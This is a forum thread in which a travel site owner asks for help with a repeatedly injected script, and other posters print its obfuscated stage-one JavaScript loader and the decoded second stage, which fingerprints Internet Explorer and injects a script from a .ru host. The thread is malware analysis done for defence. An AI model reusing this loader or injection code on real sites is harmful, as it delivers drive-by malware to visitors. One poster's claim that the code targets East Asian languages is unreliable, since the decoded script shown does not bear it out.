Website got hacked
samibdr:
Hello,
We had a problem recently with someone installing a script on our website. We had removed the script from all pages manually, changed hosting provider and changed all the passwords. Today it happened again and they managed to install the same script. This script is calling another script from ujnc.ru, jkn3.ru, porv.ru, ujnc.ru and more... The script that is called from these websites is called JS.js.
Because of this script, our website was marked as harmful by Google and we are losing clients. I'm not sure what this script is doing. I would appreciate some feedback on what's happening here.
Orac:
Can you provide a link to your website, and also the links to the scripts they're trying to install on your server?
samibdr:
my website is maltatravelnet.com
link to the script are:
http://www.jkn3.ru/js.js
http://www.ujnc.ru/js.js
http://www.porv.ru/js.js
I don't think the links are working now, but this morning they were, and I saved the js file to my PC. I zipped it and uploaded it here:
www.sb-websolutions.com/1.zip
I also included our index.htm file. You will find the script that is calling the js file at the bottom of the source code.
Please tell me what this js file is doing to our website, as I don't know JavaScript.
Thanks
MysteryFCM:
The following is what the script gets;
--- Code: ---*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://okcd.ru/cgi-bin/index.cgi?ad
Server IP: 70.126.163.53 [ 53-163.126-70.tampabay.res.rr.com ]
> 122.100.67.72 [ 122-100-67-72.cm.ubbn.net ]
> 69.133.138.54 [ cpe-069-133-138-054.ec.res.rr.com ]
> 67.70.151.9 [ bas5-toronto12-1128699657.dsl.bell.ca ]
> 24.173.57.194 [ rrcs-24-173-57-194.sw.biz.rr.com ]
> 98.233.229.119 [ c-98-233-229-119.hsd1.md.comcast.net ]
> 88.2.47.117 [ 117.Red-88-2-47.staticIP.rima-tde.net ]
> 72.51.179.194 [ host-72-51-179-194.newwavecomm.net ]
> 24.57.105.118 [ d57-105-118.home.cgocable.net ]
> 24.226.26.87 [ d226-26-87.home.cgocable.net ]
> 86.14.232.146 [ cpc5-cmbg4-0-0-cust145.cmbg.cable.ntl.com ]
> 76.248.170.0 [ adsl-76-248-170-0.dsl.chi2ca.sbcglobal.net ]
> 88.250.184.95 [ dsl88-250-47199.ttnet.net.tr ]
> 75.143.150.108 [ Resolution failed ]
> 76.124.4.21 [ c-76-124-4-21.hsd1.nj.comcast.net ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
Date: 18 August 2008
Time: 15:39:25:39
*****************************************************************
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<script type="text/javascript">
<!--
// Reviewer annotation (stage-one loader from the posted sample; the function
// text below is kept byte-for-byte). Its decoding key is derived from the
// function's OWN source -- arguments.callee.toString() -- concatenated with
// location.href, stripped of non-word characters and upper-cased, then run
// through a CRC-32-style table (polynomial 3988292384 = 0xEDB88320) to get
// an 8-character upper-case hex digest. Consequences for analysis:
//   * any edit, re-indentation or comment INSIDE the function changes the
//     key and the payload no longer decodes -- keep annotations out here;
//   * the key also binds the blob to the URL it was served from, so the hex
//     argument passed via <body onload> will not decode on another page or
//     in an offline copy whose location.href differs.
// Decoding: the hex string (first argument) is read two digits at a time,
// each byte has the next key character code subtracted (mod 256, cycling
// through the 8 digest chars), and the result is eval()'d. If eval throws,
// the page is redirected to "/" -- a silent failure path, so a visitor on
// an unintended URL just sees a reload. The second parameter is never used.
// Detection hint: arguments.callee + location.href feeding a 256-entry table
// with the 0xEDB88320 constant, followed by eval() and a window.location
// fallback, is the shape to look for in page source.
function b40R3eLSm(g1x5L617n, DxnI31GgB){var jg2U8o88H = arguments.callee;var ci0ejw4sf = location.href;jg2U8o88H = jg2U8o88H.toString();jg2U8o88H = jg2U8o88H + ci0ejw4sf;var d0Siy8ewr = jg2U8o88H.replace(/\W/g, "");d0Siy8ewr = d0Siy8ewr.toUpperCase();var MYX1e340Q = 4294967296;var CQ62jhasD = new Array;for(var e3FHCq2T3 = 0; e3FHCq2T3 < 256; e3FHCq2T3++) {CQ62jhasD[e3FHCq2T3] = 0;}var himAPxx55 = 1;for(var e3FHCq2T3 = 128; e3FHCq2T3; e3FHCq2T3 >>= 1) {himAPxx55 = himAPxx55 >>> 1 ^ (himAPxx55 & 1 ? 3988292384 : 0);for(var iS4jqp728 = 0; iS4jqp728 < 256; iS4jqp728 += e3FHCq2T3 * 2) {var RWMygP4i1 = e3FHCq2T3 + iS4jqp728;CQ62jhasD[RWMygP4i1] = CQ62jhasD[iS4jqp728] ^ himAPxx55;if (CQ62jhasD[RWMygP4i1] < 0) {CQ62jhasD[RWMygP4i1] += MYX1e340Q;}}}var Uaj1JuWwL = MYX1e340Q - 1;for(var mLpJkeD0Y = 0; mLpJkeD0Y < d0Siy8ewr.length; mLpJkeD0Y++) {var mtBwq5tH6 = (Uaj1JuWwL ^ d0Siy8ewr.charCodeAt(mLpJkeD0Y)) & 255;Uaj1JuWwL = (Uaj1JuWwL >>> 8) ^ CQ62jhasD[mtBwq5tH6];}Uaj1JuWwL = Uaj1JuWwL ^ (MYX1e340Q - 1);if (Uaj1JuWwL < 0) {Uaj1JuWwL += MYX1e340Q;}Uaj1JuWwL = Uaj1JuWwL.toString(16).toUpperCase();while(Uaj1JuWwL.length < 8) {Uaj1JuWwL = "0" + Uaj1JuWwL;}var tmIqpH535 = new Array;for(var e3FHCq2T3 = 0; e3FHCq2T3 < 8; e3FHCq2T3++) {tmIqpH535[e3FHCq2T3] = Uaj1JuWwL.charCodeAt(e3FHCq2T3);}var V44D6xwFb = "";var fWpa4Y7hY = 0;for(var e3FHCq2T3 = 0; e3FHCq2T3 < g1x5L617n.length; e3FHCq2T3 += 2){var RWMygP4i1 = g1x5L617n.substr(e3FHCq2T3, 2);var JxwOKxgq5 = parseInt(RWMygP4i1, 16);var vctXKKPN7 = JxwOKxgq5 - tmIqpH535[fWpa4Y7hY];if(vctXKKPN7 < 0) {vctXKKPN7 = vctXKKPN7 + 256;}V44D6xwFb += String.fromCharCode(vctXKKPN7);if(fWpa4Y7hY + 1 == tmIqpH535.length) {fWpa4Y7hY = 0;} else {fWpa4Y7hY++;}}var B1BkmOQej = 0;try {eval(V44D6xwFb);} catch(e) {B1BkmOQej = 1;}try {if (B1BkmOQej) {window.location = "/";}} catch(e) {}}
//-->
</script>
</head>
<body onload="b40R3eLSm('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')">
</body>
</html>
--- End code ---
I can't get it to decode any further however.
bobby:
This is the decoded script:
--- Code: ---document.Yzw7fPyy = 1;
// Decoded second stage, as posted (code left byte-for-byte; the comments are
// reviewer annotations). What the visible code does: builds a short client
// fingerprint from two Internet Explorer navigator properties, then injects a
// <script> whose src points at juc8.ru with that fingerprint appended. Nothing
// here exploits anything itself -- whatever comes next is served by that host.
//
// Guard: the block runs only while document.h3z067KE is unset. Nothing in this
// script sets h3z067KE (the line above sets a different marker, Yzw7fPyy), so
// the run-once intent presumably depends on another stage -- TODO confirm.
if (!document.h3z067KE) {
var FKC0WSnq;
// navigator.appMinorVersion (an Internet Explorer property) is scanned for
// ";SP<n>" service-pack tags; the digit after ";SP" is mapped to a two-char
// code "02".."07". "01" means no recognised tag.
var rm25DIeW = navigator.appMinorVersion;
var AqGPcVOv = -1
var OgBEVkFm = "01";
while((AqGPcVOv = rm25DIeW.indexOf(";SP", AqGPcVOv+1)) != -1) {
var TeSqM1yN = rm25DIeW.charAt(AqGPcVOv+3);
if (TeSqM1yN == "1")
OgBEVkFm = "02";
else if (TeSqM1yN == "2")
OgBEVkFm = "03";
else if (TeSqM1yN == "3")
OgBEVkFm = "04";
else if (TeSqM1yN == "4")
OgBEVkFm = "05";
else if (TeSqM1yN == "5")
OgBEVkFm = "06";
else if (TeSqM1yN == "6")
OgBEVkFm = "07";
// First recognised tag wins.
if (OgBEVkFm != "01")
break;
}
// "08" marks a "Release Candidate" build when no SP tag was recognised.
if (OgBEVkFm == "01" && rm25DIeW.indexOf("Release Candidate", 0) != -1)
OgBEVkFm = "08";
// navigator.systemLanguage (also IE-specific): first 10 characters, each
// char code hex-encoded, then right-padded with "00" to 20 characters.
var A5FLhT6b = navigator.systemLanguage.substr(0, 10);
var Tizcz0pf = "";
for(var HaFFWtHn=0;HaFFWtHn<A5FLhT6b.length;HaFFWtHn++) {
// hNelTw0w is assigned without var, i.e. an implicit global.
hNelTw0w = A5FLhT6b.charCodeAt(HaFFWtHn).toString(16);
// Looks like an intended length check for zero-padding to two hex digits, but
// as written it compares the hex STRING numerically with 2, so only char
// codes 0 and 1 ever receive the leading "0".
if (hNelTw0w < 2)
Tizcz0pf += "0";
Tizcz0pf += hNelTw0w;
}
while(Tizcz0pf.length < 20)
Tizcz0pf += "00";
// Fingerprint = service-pack code + hex language (FKC0WSnq is re-declared
// here; harmless in non-strict code).
var FKC0WSnq = OgBEVkFm + Tizcz0pf;
// Inject the next stage. Note that nothing above conditions on the language
// value -- it is only appended to the query string -- so any language-based
// targeting would have to happen on the server side, not in this script.
// Detection hint: a dynamically appended <script> whose src is a cgi-bin URL
// carrying a long hex token followed by this fingerprint.
var tYAcPMfa = document.createElement("script");
tYAcPMfa.setAttribute("type", "text/javascript");
tYAcPMfa.setAttribute("src", "http://juc8.ru/cgi-bin/index.cgi?3c42f2a30100f0600077e0ed580660b8ab990274ebb2a0ff" + FKC0WSnq);
document.body.appendChild(tYAcPMfa);
}
--- End code ---
Sorry, I do not have time now to calculate the download link, but I saw something interesting - the script will load only if the system language is set to far east Asian languages (Chinese and countries around China).